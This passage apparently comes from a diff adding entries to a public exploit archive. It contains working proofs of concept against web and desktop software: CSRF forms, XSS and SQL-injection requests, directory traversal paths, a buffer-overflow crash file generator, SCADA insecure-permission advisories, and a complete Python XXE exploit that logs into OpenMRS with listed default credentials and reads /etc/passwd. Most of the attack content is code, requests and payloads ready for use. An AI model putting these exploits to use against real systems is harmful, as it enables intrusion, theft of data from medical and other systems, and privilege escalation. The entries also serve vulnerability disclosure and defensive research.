<form action="http://127.0.0.1/dwr/call/plaincall/UserAjax.addUser.dwr" method="POST" enctype="text/plain">
<input type="hidden" name="callCount" value="1&#10;windowName&#61;c0&#45;param2&#10;c0&#45;scriptName&#61;UserAjax&#10;c0&#45;methodName&#61;addUser&#10;c0&#45;id&#61;0&#10;c0&#45;param0&#61;null&#58;null&#10;c0&#45;param1&#61;string&#58;TEST2&#10;c0&#45;param2&#61;string&#58;AAAA2&#10;c0&#45;param3&#61;string&#58;AAA2&#37;40bb&#46;net&#10;c0&#45;param4&#61;string&#58;123123&#10;batchId&#61;3&#10;instanceId&#61;0&#10;page&#61;&#37;2Fc&#37;2Fportal&#37;2Flayout&#37;3Fp&#95;l&#95;id&#37;3Da8e430e3&#45;8010&#45;40cf&#45;ade1&#45;5978e61241a8&#37;26p&#95;p&#95;id&#37;3DEXT&#95;USER&#95;ADMIN&#37;26p&#95;p&#95;action&#37;3D0&#37;26&#37;26dm&#95;rlout&#37;3D1&#37;26r&#37;3D1448026121316&#10;scriptSessionId&#61;hd2XkJoJcyP9lEk5N8qUe&#42;ouv5l&#47;mn17B5l&#45;IA&#42;1ZViJ6&#10;" />
<input type="submit" value="Tutaj" />
</form>
</body>
</html>
3. Multiple Stored And Reflected XSS:
-------------------------------------
POST /dwr/call/plaincall/TagAjax.addTag.dwr HTTP/1.1
Host: 127.0.0.1
callCount=1
windowName=c0-param0
c0-scriptName=TagAjax
c0-methodName=addTag
c0-id=0
c0-param0=<script>alert(1)<%2fscript>
c0-param1=string:
c0-param2=string:48190c8c-42c4-46af-8d1a-0cd5db894797%20
batchId=2
instanceId=0
......
POST /dwr/call/plaincall/CategoryAjax.saveOrUpdateCategory.dwr HTTP/1.1
Host: 127.0.0.1
callCount=1
windowName=c0-param5
c0-scriptName=CategoryAjax
c0-methodName=saveOrUpdateCategory
c0-id=0
c0-param0=boolean:true
c0-param1=null:null
c0-param2=<script>alert(2)<%2fscript>
c0-param3=string:ppp
c0-param4=string:aaa
c0-param5=string:bbb
batchId=2
instanceId=0
......
POST /c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LUCENE_TOOL&p_p_action=0& HTTP/1.1
Host: 127.0.0.1
query=aaaa
offset="><script>alert(3)<%2fscript>
limit=20
sort=1
userid=admin
reindexResults=true
......
http://127.0.0.1/DotAjaxDirector/com.dotmarketing.portlets.osgi.AJAX.OSGIAJAX [jar parameter]
http://127.0.0.1/api/portlet/ES_SEARCH_PORTLET/render [URL path filename]
http://127.0.0.1/c/portal/layout [limit parameter]
http://127.0.0.1/c/portal/layout [offset parameter]
http://127.0.0.1/c/portal/layout [query parameter]
http://127.0.0.1/c/portal/layout [sort parameter]
http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testIndex parameter]
http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testQuery parameter]

111
platforms/php/webapps/38907.txt Executable file
View file

@ -0,0 +1,111 @@
source: http://www.securityfocus.com/bid/64386/info
Osclass is prone to the following input-validation vulnerabilities:
1. A cross-site request-forgery vulnerability
2. Multiple directory-traversal vulnerabilities
3. An SQL-injection vulnerability
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions, to view arbitrary local files and directories within the context of the webserver, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.
Osclass 3.3 is vulnerable; other versions may also be affected.
Cross-site request forgery:
[!] Exploit Already Tested ... on apache
[^] Error console:- /general/index.php
[?] proof of concept :
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="<empty>" action="http://www.example.com/general/index.php"
method=GET enctype="multipart/form-data">
<input type=hidden size=30 maxlength=30 name=page value="">
<input type=hidden size=30 maxlength=30 name=sOrder value="">
<input type=hidden size=30 maxlength=30 name=iOrderType value="">
<td><input type=text size=30 maxlength=250 name=sPattern value=""></td>
<td><input type=text size=30 maxlength=100 name=sCity value=""></td>
<td><input type=text size=30 maxlength=100 name=sRegion value=""></td>
<td><input type=Checkbox size=10 maxlength=10 name=bPic value=""></td>
<input type=text size=30 maxlength=250 name=sPriceMin value=""></td>
<td><input type=text size=30 maxlength=100 name=sPriceMax
value=""></td>
<td><input type=Checkbox size=10 maxlength=10 name=sCategory
value=""></td>
<input type=submit class=button value='Save'>
</form>
</html>
Directory Traversal:
[!] Exploit Already Tested ... on apache
[^] Error console:- directory traversal allow to dump db
[?] proof of concept :
/general/oc-content/languages/en_US/mail.sql
/general/oc-includes/osclass/installer/basic_data.sql
/general/oc-includes/osclass/installer/pages.sql
exploit
http://www.example.com/general/oc-content/languages/en_US/mail.sql
SQL injection:
[!] Exploit Already Tested ... on apache
[^] Error console:-
1*-URL encoded GET input action was set to -1' or 18 = '16
2*-URL encoded POST input action was set to -1" or 34 = "31
[?] proof of concept :
/general/oc-admin/index.php
/general/index.php
1*-
RequestGET
/general/oc-admin/index.php?action=-1%27%20or%2018%20%3d%20%2716&page=login
HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2;
9abe5=oc_adminId._.oc_adminSecret._.oc_adminLocale%261._.7VIeKmoH._.it_IT
Host: demo.osclass.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Accept: */*
2*-
POST /general/index.php HTTP/1.1
Content-Length: 246
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2
Host: demo.osclass.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Accept: */*
action=-1%22%20or%2034%20%3d%20%2231&CSRFName=CSRF83497906_1588898183&CSRFToken=dbdd20b65f0a882be3c6629ec1d975be69c2668cdb8e75aa2b5a42f5d031b66cbaf4073567b352024e09fe04ba358c6186d1e58e1493822005a88893363a1f9d&page=login&s_email=sample%40email.tst

7
platforms/php/webapps/38908.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/64426/info
Leed is prone to an SQL-injection vulnerability.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/leed/action.php?action=removeFolder&id=[SQL Injection]

36
platforms/windows/dos/38878.txt Executable file
View file

@ -0,0 +1,36 @@
********************************************************************************************
# Exploit: WinAsm Studio 5.1.8.8 BOF.
# Date: 12/6/2015
# Exploit Author: Un_N0n
# Vendor: WinAsm
# Software Link: http://www.winasm.net/winasm-studio-updates.html
# Version: 5.1.8.8
# Tested on: Windows 7 x64(64bit)
********************************************************************************************
[Info]
Code:
rc.right = 0;
rc.bottom = 0;
DrawTextExA(
hdc,
L"I \t\u6e69\u6c63\u6475e\u6e69\.................\uf64)", <--- XXXtremely big string to draw, thus crashes.
1,
&rc,
0x2CE0u,
&dtp);
*(_DWORD *)(a1 + 420) = rc.right;
[How to?]
1 - Open up WinAsm.exe.
2 - GoTo Files -> Open Files.
3 - Browser the crash.txt in it.
~ Software will Crash.
[crash.txt?]
file = open('crash.txt','w')
file.write("A"*20000) #Crash.txt Contains 20000s As
file.close()
********************************************************************************************

92
platforms/windows/local/38903.txt Executable file
View file

@ -0,0 +1,92 @@
iniNet SpiderControl SCADA Web Server Service 2.02 Insecure File Permissions
Vendor: iniNet Solutions GmbH
Product web page: http://www.spidercontrol.net
Affected version: 2.02.0000
Summary: Modular and automated engineering is provided for HMI and
SCADA. The tools are developed to join a large range of engineering
modules together quickly. We modularize our software, as the mechanics
of a system are modularized today. Easy to visualize with a few clicks.
Desc: SpiderControl SCADA Web Server Service suffers from an elevation
of privileges vulnerability which can be used by a simple user that can
change the executable file with a binary of choice. The vulnerability
exist due to the improper permissions, with the 'C' flag (Change) for
'Everyone' and 'Authenticated Users' group making the entire directory
'WWW' and its files and sub-dirs world-writable.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5284
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5284.php
22.10.2015
--
C:\WWW>dir
Volume in drive C is Windows
Volume Serial Number is 56F3-8688
Directory of C:\WWW
22/10/2015 10:54 <DIR> .
22/10/2015 10:54 <DIR> ..
22/10/2015 10:55 <DIR> HMI
07/02/2008 23:41 147,968 libnodave.dll
22/10/2015 10:54 <DIR> Manual
07/07/2015 12:03 1,687,552 SCADAControlPanel.exe
07/07/2015 12:03 203,776 ScadaWindowsService.exe
22/10/2015 10:54 3,092 unins000.dat
22/10/2015 10:53 719,496 unins000.exe
07/07/2015 12:07 793,088 ZelsWebServ.dll
22/10/2015 10:54 1,546 ZelsWebServ.xml
22/10/2015 10:55 38,696 ZelsWebServ_log.txt
8 File(s) 3,595,214 bytes
4 Dir(s) 77,683,298,304 bytes free
C:\WWW>cacls *.exe
C:\WWW\SCADAControlPanel.exe Everyone:C
BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
C:\WWW\ScadaWindowsService.exe Everyone:C
BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
C:\WWW\unins000.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
---
C:\Users\joxy>sc qc SCADAServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SCADAServer
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WWW\ScadaWindowsService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SCADA Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

106
platforms/windows/local/38904.txt Executable file
View file

@ -0,0 +1,106 @@
iniNet SpiderControl PLC Editor Simatic 6.30.04 Insecure File Permissions
Vendor: iniNet Solutions GmbH
Product web page: http://www.spidercontrol.net
Affected version: 6.30.04 (Build 6300400)
Summary: Modular and automated engineering is provided for HMI and
SCADA. The tools are developed to join a large range of engineering
modules together quickly. We modularize our software, as the mechanics
of a system are modularized today. Easy to visualize with a few clicks.
Desc: SpiderControl PLC Editor Simatic suffers from an elevation of
privileges vulnerability which can be used by a simple user that can
change the executable file with a binary of choice. The vulnerability
exist due to the improper permissions, with the 'F' flag (Full) for
'Everyone' group, and 'C' flag (Change) for 'Authenticated Users' group
making the entire directory 'PLCEditorSimatic_6300400' and its files
and sub-dirs world-writable.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5283
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5283.php
22.10.2015
--
C:\SpiderControl\PLCEditorSimatic_6300400>cacls PLCEditorSimatic.exe
C:\SpiderControl\PLCEditorSimatic_6300400\PLCEditorSimatic.exe Everyone:(ID)F
BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
C:\SpiderControl\PLCEditorSimatic_6300400>dir
Volume in drive C is Windows
Volume Serial Number is 56F3-8688
Directory of C:\SpiderControl\PLCEditorSimatic_6300400
22/10/2015 10:10 <DIR> .
22/10/2015 10:10 <DIR> ..
09/05/2012 14:03 379 fontconfig.txt
22/10/2015 10:10 <DIR> HTML5Comp
22/10/2015 10:10 <DIR> HWSpecific
24/06/2015 18:42 386,812 IMasterSimatic6_30_04.jar
22/10/2015 10:10 <DIR> ImportNConvertComp
22/10/2015 10:10 <DIR> MacroDlgComp
22/10/2015 10:10 <DIR> MacroDlgRuntime
22/10/2015 10:10 <DIR> MacroLib
22/10/2015 10:10 <DIR> MacroLibTempFiles
26/04/2005 15:26 320 MsgBox.teq
22/10/2015 10:10 <DIR> News_ReleaseNotes
06/06/2012 11:06 81 PLCEditorExtraBatch.bat
11/01/2013 12:29 727 PLCEditorKey.spl
02/07/2015 22:58 7,997,440 PLCEditorSimatic.exe
26/11/2014 19:04 3,806 PLCPPOCheckCfgSimaticPLC.xml
02/07/2015 18:25 2,958,336 PLC_FontGenerator.exe
22/10/2015 10:10 <DIR> Projects
17/06/2015 10:58 34,275 PropWndDescript.xml
25/04/2014 16:55 104,254 s7api.jar
18/05/2015 12:28 42,478 ScadaDescript.xml
10/01/2011 15:09 208 ScadaPPOList.csv
22/10/2015 10:10 <DIR> SCUtils
09/02/2015 13:27 8,242 SimaticDefaultSpiderHWProfile.shp
01/07/2015 16:36 2,693,569 SimaticPLCHelp.chm
22/10/2015 10:30 <DIR> SimulateRuntime
22/10/2015 10:10 <DIR> SimulationComp
06/09/2012 11:13 65,536 SpiderLink1.dll
06/09/2012 11:13 65,536 SpiderLink2.dll
06/09/2012 11:13 65,536 SpiderLink3.dll
06/09/2012 11:13 65,536 SpiderLink4.dll
02/07/2015 18:26 265,216 SpiderObserver.dll
02/07/2015 18:25 269,824 SpiderOPCBrowser.dll
02/07/2015 23:42 483,328 SPSVarSelectorCsv.dll
02/07/2015 18:26 430,080 SPSVarSelectorTpy.dll
22/10/2015 10:10 <DIR> SVGComp
22/10/2015 10:10 86,988 unins000.dat
22/10/2015 10:10 736,929 unins000.exe
10/01/2011 15:05 28 ZelsCfg.csv
22/10/2015 10:10 <DIR> ZipComp
25 File(s) 16,765,464 bytes
16 Dir(s) 77,686,059,008 bytes free
C:\SpiderControl\PLCEditorSimatic_6300400>cd ..
C:\SpiderControl>cacls PLCEditorSimatic_6300400
C:\SpiderControl\PLCEditorSimatic_6300400 Everyone:(OI)(CI)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

11
platforms/windows/remote/38910.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/64499/info
Hancom Office is prone to a remote heap-based buffer-overflow vulnerability.
An attacker can exploit this issue by enticing an unsuspecting victim to open a malicious '.hml' document file.
Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
Hancom Office 2010 SE 8.5.8 is vulnerable; Other versions may also be affected.
<TEXTART Text="AAAAAAAA...(more than 500 bytes)" X0="0" X1="14173" X2="14173" X3="0" Y0="0" Y1="0" Y2="14173" Y3="14173">

288
platforms/xml/webapps/38896.py Executable file
View file

@ -0,0 +1,288 @@
#!/usr/bin/env python
#
# OpenMRS 2.3 (1.11.4) XML External Entity (XXE) Processing PoC Exploit
#
#
# Vendor: OpenMRS Inc.
# Product web page: http://www.openmrs.org
# Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0)
# OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b))
#
# Summary: OpenMRS is an application which enables design of a customized medical
# records system with no programming knowledge (although medical and systems analysis
# knowledge is required). It is a common framework upon which medical informatics
# efforts in developing countries can be built.
#
# Desc: The vulnerability is caused due to an error when parsing XML entities within
# ZIP archives and can be exploited to e.g. disclose data from local resources or cause
# a DoS condition (billion laughs) via a specially crafted XML file including external
# entity references.
#
#
# Tested on: Ubuntu 12.04.5 LTS
# Apache Tomcat/7.0.26
# Apache Tomcat/6.0.36
# Apache Coyote/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5289
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5289.php
#
# Affected: OpenMRS Core, Serialization.Xstream module, Metadata Sharing module
# Severity: Major
# Exploit: Remote Code Execution by an authenticated user
#
# Vendor Bug Fixes:
#
# Disabled serialization and deserialization of dynamic proxies
# Disabled deserialization of external entities in XML files
# Disabled spring's Expression Language support
#
# https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868
# https://talk.openmrs.org/t/critical-security-advisory-2015-11-25/3824
# https://wiki.openmrs.org/display/RES/Release+Notes+2.3.1
# http://openmrs.org/2015/12/reference-application-2-3-1-released/
# https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.9.10
# https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.10.3
# https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.11.5
# https://modules.openmrs.org/modulus/api/releases/1308/download/serialization.xstream-0.2.10.omod
# https://modules.openmrs.org/modulus/api/releases/1309/download/metadatasharing-1.1.10.omod
# https://modules.openmrs.org/modulus/api/releases/1303/download/reporting-0.9.8.1.omod
#
# OpenMRS platform has been upgraded to version 1.11.5
# Reporting module has been upgraded to version 0.9.8.1
# Metadata sharing module has been upgraded to version 1.1.10
# Serialization.xstream module has been upgraded to version 0.2.10
#
# Who is affected?
#
# Anyone running OpenMRS Platform (1.9.0 and later)
# Anyone running OpenMRS Reference Application 2.0, 2.1, 2.2, 2.3
# Anyone that has installed the serialization.xstream module except for the newly released 0.2.10 version.
# Anyone that has installed the metadatasharing module except for the newly released 1.1.10 version.
#
#
# 02.11.2015
#
import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import time, datetime, re, zipfile, os
import binascii
from urllib2 import URLError
global bindata
piton = os.path.basename(sys.argv[0])
def bannerche():
print '''
@-------------------------------------------------@
| |
| OpenMRS 2.3 Authenticated XXE Exploit |
| ID: ZSL-2015-5289 |
| Copyleft (c) 2015, Zero Science Lab |
| |
@-------------------------------------------------@
'''
if len(sys.argv) < 4:
print '\n[+] Usage: '+piton+' <host> <port> <path> \n'
print '[+] Example: '+piton+' uat05.zeroscience.mk 8080 openmrs\n'
sys.exit()
bannerche()
print '[+] Date: '+str(datetime.date.today())
payload = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ZSL [
<!ENTITY xxe1 SYSTEM "file:////etc/passwd" >
<!ENTITY xxe2 SYSTEM "file:///etc/resolv.conf" >
<!ENTITY xxe3 SYSTEM "file:///etc/issue" >]>
<package id="1" uuid="eecb64f8-35b0-412b-acda-3d83edf4ee63">
<dateCreated id="2">2015-11-06 10:47:19</dateCreated>
<name>&xxe1;</name>
<description>&xxe2;</description>
<openmrsVersion>&xxe3;</openmrsVersion>
<version>1</version>
</package>'''
print '[+] Creating header.xml file.'
file = open('header.xml', 'w')
file.write(payload)
file.close()
time.sleep(1)
print '[+] Packing evil XML file.'
with zipfile.ZipFile('xxe.zip', 'w') as devzip:
devzip.write('header.xml')
os.remove('header.xml')
print '[+] XML file vacuumed.'
time.sleep(1)
filename = 'xxe.zip'
with open(filename, 'rb') as f:
content = f.read()
hexo = binascii.hexlify(content)
bindata = binascii.unhexlify(hexo)
print '[+] File xxe.zip successfully created!'
print '[+] Initialising communication.'
host = sys.argv[1]
port = sys.argv[2]
path = sys.argv[3]
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
print '[+] Probing target http://'+host+':'+port+'/'+path+'/'
try:
checkhost = opener.open('http://'+host+':'+port+'/'+path+'/login.htm')
hostresp = checkhost.read()
except urllib2.HTTPError, errorzio:
if errorzio.code == 404:
print '[+] Error:'
print '[+] Check your path entry!'
print
sys.exit()
except URLError, errorziocvaj:
if errorziocvaj.reason:
print '[+] Error:'
print '[+] Check your hostname entry!'
print
sys.exit()
print '[+] Target seems OK.'
print '[+] Login please:'
print '''
Username: doctor nurse clerk sysadmin admin scheduler
Password: Doctor123 Nurse123 Clerk123 Sysadmin123 Admin123 Scheduler123
'''
username = raw_input('[*] Enter username: ')
password = raw_input('[*] Enter password: ')
login_data = urllib.urlencode({
'username' : username,
'password' : password,
'sessionLocation' : '3',
'redirectUrl' : '/'+path+'/module/metadatasharing/import/list.form'
})
login = opener.open('http://'+host+':'+port+'/'+path+'/login.htm', login_data)
auth = login.read()
for session in cj:
sessid = session.name
print '[+] Mapping session ID.'
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '[+] Cookie: '+cookie
if re.search(r'Invalid username/password. Please try again', auth):
print '[+] Incorrect username or password.'
print
sys.exit()
else:
print '[+] Authenticated!'
opener.open('http://'+host+':'+port+'/'+path+'/module/metadatasharing/import/list.form')
print '[+] Sending payload.'
class MultiPartForm(object):
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
self.form_fields.append((name, value))
return
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return
def __str__(self):
parts = []
part_boundary = '--' + self.boundary
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
if __name__ == '__main__':
form = MultiPartForm()
form.add_field('file"; filename="xxe.zip', bindata)
form.add_field('url', '')
request = urllib2.Request('http://'+host+':'+port+'/'+path+'/module/metadatasharing/import/upload.form')
request.add_header('User-agent', 'joxypoxy 6.5')
body = str(form)
request.add_header('Origin', 'http://'+host+':'+port)
request.add_header('Accept-Encoding', 'gzip, deflate')
request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8')
request.add_header('Accept-Language', 'en-US,en;q=0.8')
request.add_header('Cache-Control', 'max-age=0')
request.add_header('Upgrade-Insecure-Requests', '1')
request.add_header('Referer', 'http://'+host+':'+port+'/'+path+'/module/metadatasharing/import/upload.form')
request.add_header('Content-type', form.get_content_type())
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()
time.sleep(1)
print '[+] Retrieving /etc/passwd:'
time.sleep(2)
getinfo = opener.open('http://'+host+':'+port+'/'+path+'/module/metadatasharing/import/validate.form')
readinfo = getinfo.read()
striphtml = re.sub("<.*?>", "", readinfo)
match = re.search(r'root:.*/bin/bash', striphtml, re.DOTALL)
print '\n--------------------------------------------------------'
print match.group(0)
print '--------------------------------------------------------'
sys.exit()

78
platforms/xml/webapps/38897.txt Executable file
View file

@ -0,0 +1,78 @@
OpenMRS 2.3 (1.11.4) Expression Language Injection Vulnerability
Vendor: OpenMRS Inc.
Product web page: http://www.openmrs.org
Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0)
OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b))
Summary: OpenMRS is an application which enables design
of a customized medical records system with no programming
knowledge (although medical and systems analysis knowledge
is required). It is a common framework upon which medical
informatics efforts in developing countries can be built.
Desc: Input passed via the 'personType' parameter is not
properly sanitised in the spring's expression language
support via 'addPerson.htm' script before being used. This
can be exploited to inject expression language (EL) and
subsequently execute arbitrary Java code.
Tested on: Ubuntu 12.04.5 LTS
Apache Tomcat/7.0.26
Apache Tomcat/6.0.36
Apache Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5288
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5288.php
Affected: OpenMRS Core, Serialization.Xstream module, Metadata Sharing module
Severity: Major
Exploit: Remote Code Execution by an authenticated user
Vendor Bug Fixes:
Disabled serialization and deserialization of dynamic proxies
Disabled deserialization of external entities in XML files
Disabled spring's Expression Language support
https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868
https://talk.openmrs.org/t/critical-security-advisory-2015-11-25/3824
https://wiki.openmrs.org/display/RES/Release+Notes+2.3.1
http://openmrs.org/2015/12/reference-application-2-3-1-released/
https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.9.10
https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.10.3
https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.11.5
https://modules.openmrs.org/modulus/api/releases/1308/download/serialization.xstream-0.2.10.omod
https://modules.openmrs.org/modulus/api/releases/1309/download/metadatasharing-1.1.10.omod
https://modules.openmrs.org/modulus/api/releases/1303/download/reporting-0.9.8.1.omod
OpenMRS platform has been upgraded to version 1.11.5
Reporting module has been upgraded to version 0.9.8.1
Metadata sharing module has been upgraded to version 1.1.10
Serialization.xstream module has been upgraded to version 0.2.10
Who is affected?
Anyone running OpenMRS Platform (1.9.0 and later)
Anyone running OpenMRS Reference Application 2.0, 2.1, 2.2, 2.3
Anyone that has installed the serialization.xstream module except for the newly released 0.2.10 version.
Anyone that has installed the metadatasharing module except for the newly released 1.1.10 version.
02.11.2015
--
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${3*3}&viewType=
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${applicationScope}&viewType=
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=%3Ci%3E${username}&viewType=
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${cookie[%22JSESSIONID%22].value}
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${Condition?%22Ok%22:3%3C2}

121
platforms/xml/webapps/38898.txt Executable file
View file

@ -0,0 +1,121 @@
OpenMRS 2.3 (1.11.4) Multiple Cross-Site Scripting Vulnerabilities
Vendor: OpenMRS Inc.
Product web page: http://www.openmrs.org
Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0)
OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b))
Summary: OpenMRS is an application which enables design
of a customized medical records system with no programming
knowledge (although medical and systems analysis knowledge
is required). It is a common framework upon which medical
informatics efforts in developing countries can be built.
Desc: OpenMRS suffers from multiple stored and reflected
cross-site scripting vulnerabilities when input passed via
several parameters to several scripts is not properly sanitized
before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser
session in context of an affected site.
Tested on: Ubuntu 12.04.5 LTS
Apache Tomcat/7.0.26
Apache Tomcat/6.0.36
Apache Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5287
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5287.php
Vendor: https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868
02.11.2015
--
PoC:
<html>
<body>
<form action="http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form" method="POST">
<input type="hidden" name="parentUUID" value="71dde2c8&#45;60be&#45;4171&#45;9d3d&#45;71293cdc4142" />
<input type="hidden" name="name" value=""><script>alert&#40;1&#41;<&#47;script>" />
<input type="hidden" name="description" value=""><script>alert&#40;2&#41;<&#47;script>" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Other vulnerable scripts/parameters (GET/POST, Stored/Reflected)
Payload: <script>alert(1)</script>
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [addName parameter]
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [personType parameter]
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [viewType parameter]
http://127.0.0.1:8080/openmrs/admin/users/users.list [Referer HTTP header]
http://127.0.0.1:8080/openmrs/admin/users/user.form [userId parameter]
http://127.0.0.1:8080/openmrs/options.form [defaultLocation parameter]
http://127.0.0.1:8080/openmrs/options.form [lang parameter]
http://127.0.0.1:8080/openmrs/options.form [newPassword parameter]
http://127.0.0.1:8080/openmrs/options.form [oldPassword parameter]
http://127.0.0.1:8080/openmrs/options.form [personName.familyName parameter]
http://127.0.0.1:8080/openmrs/options.form [personName.givenName parameter]
http://127.0.0.1:8080/openmrs/options.form [secretAnswerNew parameter]
http://127.0.0.1:8080/openmrs/options.form [secretQuestionPassword parameter]
http://127.0.0.1:8080/openmrs/options.form [username parameter]
http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [addUserAccount parameter]
http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [familyName parameter]
http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [gender parameter]
http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [givenName parameter]
http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [username parameter]
http://127.0.0.1:8080/openmrs/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page [definitionUiResource parameter]
http://127.0.0.1:8080/openmrs/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page [returnUrl parameter]
http://127.0.0.1:8080/openmrs/login.htm [sessionLocation parameter]
http://127.0.0.1:8080/openmrs/referenceapplication/userApp.page [action parameter]
